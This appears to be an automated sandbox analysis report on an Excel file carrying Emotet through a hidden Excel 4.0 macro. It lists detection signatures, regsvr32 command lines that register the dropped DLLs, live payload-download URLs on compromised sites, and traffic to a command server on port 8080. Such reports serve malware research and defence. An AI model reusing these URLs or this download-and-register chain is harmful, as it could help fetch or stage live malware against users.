Windows Analysis Report
Datei_26744565.xls

Overview

General Information

Sample Name:Datei_26744565.xls
Analysis ID:632101
MD5:a8777e5596125dadbb7563052324e1bb
SHA1:bbd66379044f8d49541a7ae6d793b44a0aea3b49
SHA256:cbd5b0454385324baee6fc97124c8656ea55f4272f7365e2fbcf570470cba4e6
Tags:xls
Infos:

Detection

Hidden Macro 4.0, Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Office process drops PE file
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Downloads executable code via HTTP
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Drops PE files to the user directory
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2816 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 2180 cmdline: C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2420 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\RrQZitdNyvCFEhe\pDnxsvRJXW.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2408 cmdline: C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 3020 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\MreGm\Zazriwdkuo.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2412 cmdline: C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2944 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AnDDvm\lwQjfM.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1740 cmdline: C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2680 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\IvkabqgmpEJ\fEKh.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000003.00000002.917379514.0000000001FE0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
00000009.00000002.947582927.0000000180001000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
00000008.00000002.1214454935.00000000001C0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
00000007.00000002.932534809.0000000180001000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
00000006.00000002.1215133055.0000000180001000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |

Source | Rule | Description | Author | Strings
6.2.regsvr32.exe.3c0000.0.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
6.2.regsvr32.exe.3c0000.0.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
4.2.regsvr32.exe.3c0000.0.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
3.2.regsvr32.exe.1fe0000.0.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
7.2.regsvr32.exe.2e0000.0.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
                      No Sigma rule has matched
                      No Snort rule has matched

                      AV Detection

                      Source: Datei_26744565.xls, ReversingLabs: Detection: 39%
                      Source: http://learnviaonline.com/wp-admin/qGb/, Avira URL Cloud: Label: malware
                      Source: http://milanstaffing.com/images/D4TRnDubF/, Avira URL Cloud: Label: malware
                      Source: http://kolejleri.com/wp-admin/REvup/, Avira URL Cloud: Label: malware
                      Source: kolejleri.com, Virustotal: Detection: 11%
                      Source: milanstaffing.com, Virustotal: Detection: 6%
                      Source: learnviaonline.com, Virustotal: Detection: 8%
                      Source: stainedglassexpress.com, Virustotal: Detection: 5%
                      Source: http://learnviaonline.com/wp-admin/qGb/, Virustotal: Detection: 14%
                      Source: http://milanstaffing.com/images/D4TRnDubF/, Virustotal: Detection: 13%
                      Source: http://kolejleri.com/wp-admin/REvup/, Virustotal: Detection: 18%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll, ReversingLabs: Detection: 58%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll, Metadefender: Detection: 28%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll, ReversingLabs: Detection: 60%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll, ReversingLabs: Detection: 58%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll, ReversingLabs: Detection: 58%
                      Source: C:\Users\user\uxevr1.ocx, ReversingLabs: Detection: 58%
                      Source: C:\Users\user\uxevr2.ocx, ReversingLabs: Detection: 58%
                      Source: C:\Users\user\uxevr3.ocx, ReversingLabs: Detection: 58%
                      Source: C:\Users\user\uxevr4.ocx, Metadefender: Detection: 28%
                      Source: C:\Users\user\uxevr4.ocx, ReversingLabs: Detection: 60%
                      Source: C:\Windows\System32\AnDDvm\lwQjfM.dll (copy), ReversingLabs: Detection: 58%
                      Source: C:\Windows\System32\IvkabqgmpEJ\fEKh.dll (copy), Metadefender: Detection: 28%
                      Source: C:\Windows\System32\IvkabqgmpEJ\fEKh.dll (copy), ReversingLabs: Detection: 60%
                      Source: C:\Windows\System32\MreGm\Zazriwdkuo.dll (copy), ReversingLabs: Detection: 58%
                      Source: C:\Windows\System32\RrQZitdNyvCFEhe\pDnxsvRJXW.dll (copy), ReversingLabs: Detection: 58%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll, Joe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll, Joe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll, Joe Sandbox ML: detected
                      Source: C:\Users\user\uxevr3.ocx, Joe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll, Joe Sandbox ML: detected
                      Source: C:\Users\user\uxevr1.ocx, Joe Sandbox ML: detected
                      Source: C:\Users\user\uxevr4.ocx, Joe Sandbox ML: detected
                      Source: C:\Users\user\uxevr2.ocx, Joe Sandbox ML: detected
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: C:\Windows\System32\regsvr32.exe, Code function: 4_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose,4_2_000000018000BEF0
                      Source: C:\Windows\System32\regsvr32.exe, Code function: 6_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose,6_2_000000018000BEF0
                      Source: C:\Windows\System32\regsvr32.exe, Code function: 8_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose,8_2_000000018000BEF0
                      Source: C:\Windows\System32\regsvr32.exe, Code function: 10_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose,10_2_000000018000BEF0

                      Software Vulnerabilities

                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: Jf8[1].dll.0.dr
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process created: C:\Windows\System32\regsvr32.exe
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
                      Source: global traffic, DNS query: name: learnviaonline.com
                      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 103.171.181.223:80

                      Networking

                      Source: C:\Windows\System32\regsvr32.exe, Network Connect: 165.22.73.229 8080
                      Source: Joe Sandbox View, ASN Name: MYLOC-ASIPBackboneofmyLocmanagedITAGDE MYLOC-ASIPBackboneofmyLocmanagedITAGDE
                      Source: Joe Sandbox View, IP Address: 103.171.181.223 103.171.181.223
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 23 May 2022 07:50:02 GMTServer: ApacheCache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Mon, 23 May 2022 07:50:03 GMTContent-Disposition: attachment; filename="Jf8.dll"Content-Transfer-Encoding: binarySet-Cookie: 628b3cab47229=1653292203; expires=Mon, 23-May-2022 07:51:03 GMT; Max-Age=60; path=/Last-Modified: Mon, 23 May 2022 07:50:03 GMTContent-Length: 371200Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownload
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 23 May 2022 07:50:10 GMTServer: ApacheX-Powered-By: PHP/7.3.33Cache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Mon, 23 May 2022 07:50:10 GMTContent-Disposition: attachment; filename="1Cb5zOjLgWGDemz55C5.dll"Content-Transfer-Encoding: binarySet-Cookie: 628b3cb29fefc=1653292210; expires=Mon, 23-May-2022 07:51:10 GMT; Max-Age=60; path=/Last-Modified: Mon, 23 May 2022 07:50:10 GMTContent-Length: 371200X-Content-Type-Options: nosniffVary: User-AgentKeep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownload
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKConnection: Keep-AliveKeep-Alive: timeout=5, max=100x-powered-by: PHP/7.0.33set-cookie: 628b3cb8b9778=1653292216; expires=Mon, 23-May-2022 07:51:16 GMT; Max-Age=60; path=/cache-control: no-cache, must-revalidatepragma: no-cachelast-modified: Mon, 23 May 2022 07:50:16 GMTexpires: Mon, 23 May 2022 07:50:16 GMTcontent-type: application/x-msdownloadcontent-disposition: attachment; filename="T35PENELLOsp.dll"content-transfer-encoding: binarycontent-length: 371200date: Mon, 23 May 2022 07:50:16 GMTserver: LiteSpeedvary: User-Agent
                      Source: global traffic, HTTP traffic detected: GET /wp-admin/qGb/ HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: learnviaonline.com | Connection: Keep-Alive
                      Source: global traffic, HTTP traffic detected: GET /wp-admin/REvup/ HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: kolejleri.com | Connection: Keep-Alive
                      Source: global traffic, HTTP traffic detected: GET /classes/05SkiiW9y4DDGvb6/ HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: stainedglassexpress.com | Connection: Keep-Alive
                      Source: global traffic, HTTP traffic detected: GET /images/D4TRnDubF/ HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: milanstaffing.com | Connection: Keep-Alive
                      Source: global traffic, TCP traffic: 192.168.2.22:49175 -> 165.22.73.229:8080
                      Source: unknown, TCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.com
                      Source: regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/
                      Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1214603254.00000000002DC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1215024269.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214998850.0000000002F44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                      Source: regsvr32.exe, 00000004.00000002.1214980214.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1215008550.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1215002537.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1214961522.0000000002F30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll
                      Source: unknown DNS traffic detected: queries for: learnviaonline.com
                      Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180017C8C InternetReadFile,4_2_0000000180017C8C
                      Source: global traffic HTTP traffic detected: GET /wp-admin/qGb/ HTTP/1.1 Accept: */* UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: learnviaonline.com Connection: Keep-Alive
                      Source: global traffic HTTP traffic detected: GET /wp-admin/REvup/ HTTP/1.1 Accept: */* UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: kolejleri.com Connection: Keep-Alive
                      Source: global traffic HTTP traffic detected: GET /classes/05SkiiW9y4DDGvb6/ HTTP/1.1 Accept: */* UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: stainedglassexpress.com Connection: Keep-Alive
                      Source: global traffic HTTP traffic detected: GET /images/D4TRnDubF/ HTTP/1.1 Accept: */* UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: milanstaffing.com Connection: Keep-Alive

                      E-Banking Fraud


                      System Summary

                      Source: Screenshot number: 4 Screenshot OCR: Enable Editing and click Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
                      Source: Screenshot number: 4 Screenshot OCR: Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
                      Source: Datei_26744565.xls Macro extractor: Sheet: PKEKPPGEKKPGE contains: URLDownloadToFileA
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr1.ocx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr3.ocx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr2.ocx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr4.ocx
                      Source: Datei_26744565.xls Initial sample: EXEC
                      Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\system32\RrQZitdNyvCFEhe\
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180013B943_2_0000000180013B94
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001479C3_2_000000018001479C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000E7A03_2_000000018000E7A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800087A43_2_00000001800087A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180017BA83_2_0000000180017BA8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000EBAC3_2_000000018000EBAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001B3B83_2_000000018001B3B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180012BB83_2_0000000180012BB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800257C03_2_00000001800257C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180008BC03_2_0000000180008BC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800117C43_2_00000001800117C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800227E03_2_00000001800227E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_003B00004_2_003B0000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800083F84_2_00000001800083F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800264104_2_0000000180026410
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000680F4_2_000000018000680F
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180025C304_2_0000000180025C30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800136744_2_0000000180013674
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180017C8C4_2_0000000180017C8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000A48C4_2_000000018000A48C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180011CCC4_2_0000000180011CCC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000BEF04_2_000000018000BEF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800297104_2_0000000180029710
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180026F144_2_0000000180026F14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800237484_2_0000000180023748
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180001D584_2_0000000180001D58
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002B3684_2_000000018002B368
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800013784_2_0000000180001378
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800105904_2_0000000180010590
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800091A84_2_00000001800091A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800165E44_2_00000001800165E4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180018FE84_2_0000000180018FE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001ABE84_2_000000018001ABE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180029DF04_2_0000000180029DF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800243F44_2_00000001800243F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180015DF44_2_0000000180015DF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800011F44_2_00000001800011F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800247FC4_2_00000001800247FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001DBFC4_2_000000018001DBFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000FE084_2_000000018000FE08
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001100C4_2_000000018001100C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180027E144_2_0000000180027E14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000B6184_2_000000018000B618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800232204_2_0000000180023220
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180027C284_2_0000000180027C28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180020A344_2_0000000180020A34
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800076344_2_0000000180007634
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180022E384_2_0000000180022E38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000E6384_2_000000018000E638
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002143C4_2_000000018002143C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001303C4_2_000000018001303C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002A8404_2_000000018002A840
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800038404_2_0000000180003840
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000B4444_2_000000018000B444
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000F0484_2_000000018000F048
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002AC4C4_2_000000018002AC4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800100504_2_0000000180010050
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800102504_2_0000000180010250
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800030504_2_0000000180003050
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180011E5C4_2_0000000180011E5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000445C4_2_000000018000445C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000C85C4_2_000000018000C85C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800034604_2_0000000180003460
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180026A644_2_0000000180026A64
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800042644_2_0000000180004264
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180029C6C4_2_0000000180029C6C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001586C4_2_000000018001586C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000406C4_2_000000018000406C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000E06C4_2_000000018000E06C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000BC704_2_000000018000BC70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000F6784_2_000000018000F678
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000E2784_2_000000018000E278
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001447C4_2_000000018001447C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180005E7C4_2_0000000180005E7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180026C804_2_0000000180026C80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180010C844_2_0000000180010C84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180025E884_2_0000000180025E88
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800160884_2_0000000180016088
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800028884_2_0000000180002888
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002868C4_2_000000018002868C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000FC8C4_2_000000018000FC8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002D0984_2_000000018002D098
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180014E984_2_0000000180014E98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180014AA44_2_0000000180014AA4
